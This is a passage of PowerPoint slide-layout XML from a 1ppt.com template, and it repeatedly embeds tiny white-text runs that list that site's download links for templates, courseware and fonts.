                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout55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55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55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55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55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55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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout55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55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55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55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56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56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56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56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56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56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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout56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56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56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56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57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57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57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57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57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57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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
